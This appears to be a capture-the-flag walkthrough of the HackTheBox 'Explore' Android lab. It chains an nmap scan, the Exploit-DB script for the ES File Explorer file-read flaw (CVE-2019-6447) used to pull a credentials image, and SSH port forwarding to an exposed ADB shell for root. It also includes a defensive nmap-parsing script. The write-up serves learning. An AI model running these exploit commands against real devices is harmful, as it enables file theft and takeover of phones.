Today we take on another challenge from "HackTheBox" called "Explore". This lab is based on Android exploitation, where a vulnerable ES File Explorer is the entry point. So without wasting too much time, let's start.
Level: Easy
Attacking Strategy
- Network Scanning
- Nmap
- Exploitation
- ES File Explorer vulnerability (CVE-2019-6447)
- Privilege Escalation
- Port Forwarding
- ADB Shell
Walkthrough
IP Address: 10.10.10.247
We start with an Nmap scan, which reveals several open ports and services: SSH on 2222, HTTP on 42135, HTTP on 59777, etc.
nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.247
Nmap scan report for 10.10.10.247
Host is up (0.091s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
36917/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sat, 16 Oct 2021 06:03:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sat, 16 Oct 2021 06:03:39 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:39 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Service Info: Device: phone
From the service info in the Nmap result it is clear this is some kind of Android device. Next we enumerate the HTTP service on port 59777 with content discovery tools like gobuster and dirb, but nothing turns up. In 2018 we had KitKat based Android devices whose file system is presented as sdcard, sdcard0, sdcard1 (which I remember correctly from rooting devices at that time). So we try enumerating those paths on this endpoint.
feroxbuster -u http://10.10.10.247:59777/sdcard -x txt

And we got the flag here, but after some time this service turns out to be a dead end, as nothing else is disclosed.
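Before moving on, as an added example that is not part of the original writeup: a small Python parser for the Nmap normal (-oN) output shown above, which turns the port table into the exposure findings a defender would want from this scan (ADB on 5555 and the ES File Explorer HTTP servers on 42135 and 59777). The port lines are a constructed excerpt of the scan above; the exposure notes are assumptions drawn from the writeup and the CVE, not scan output.

```python
import re
from typing import Dict, List

# Constructed excerpt of the scan above (port lines only; the fingerprint
# dump is not needed for this check). Assumes nmap normal (-oN) format.
NMAP_NORMAL_OUTPUT = """\
Nmap scan report for 10.10.10.247
Host is up (0.091s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
5555/tcp filtered freeciv
36917/tcp open unknown
42135/tcp open http ES File Explorer Name Response httpd
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
Service Info: Device: phone
"""

# port/proto state service [version...]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# What each port means on an Android host (assumed from the writeup and the
# CVE, not from the scan). Nmap mislabels 5555 as "freeciv" and 59777 as
# "Bukkit JSONAPI"; the ES File Explorer banner on 42135 and the
# "Device: phone" line are what resolve the picture.
EXPOSURE_NOTES = {
    5555: "adb over TCP: a device shell for anyone who can reach it; disable adb tcpip or firewall it",
    42135: "ES File Explorer httpd: confirms the vulnerable app is installed; update or remove it",
    59777: "ES File Explorer HTTP server: unauthenticated file listing/read (CVE-2019-6447); update or remove it",
}

def parse_ports(output: str) -> List[dict]:
    """Extract the port table from nmap -oN output."""
    ports = []
    for line in output.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports

def is_android(output: str, ports: List[dict]) -> bool:
    """Same evidence the writeup uses: the Device: phone line or the ES banner."""
    return "Device: phone" in output or any("ES File Explorer" in p["version"] for p in ports)

def assess(output: str) -> Dict[int, str]:
    """Map each risky open/filtered port to a finding; empty if not an Android host."""
    ports = parse_ports(output)
    if not is_android(output, ports):
        return {}
    return {p["port"]: f"{p['state']}: {EXPOSURE_NOTES[p['port']]}"
            for p in ports
            if p["port"] in EXPOSURE_NOTES and p["state"] in ("open", "filtered")}
```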

Exploitation
So we move to the second port, 42135, on which ES File Explorer is running. After googling the service we find an exploit for an arbitrary file read vulnerability.

So we simply download the exploit from Exploit-DB. After reading the exploit we see it accepts commands like getDeviceInfo, getFile, etc.
python3 50070.py getDeviceInfo 10.10.10.247
python3 50070.py listPics 10.10.10.247
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg

The "listPics" command lists some pictures, one of which is "creds.jpg", so we simply download that file with the "getFile" command and obtain credentials for the "kristi" user.

kristi
[email protected]!
Privilege Escalation
Now we have SSH credentials for a low-privileged user, but we want root, and this is where we get stuck: the only port left untouched is 5555, which ADB uses by default. We need to study ADB a little; after that, all we need to do is a simple port forward and then access the shell over localhost.
ssh -L 5555:localhost:5555 [email protected] -p 2222
Once the port forwarding is done we can access the shell on localhost, switch user to root and collect the flags.
adb -s 127.0.0.1:5555 shell
su
cat data/root.txt
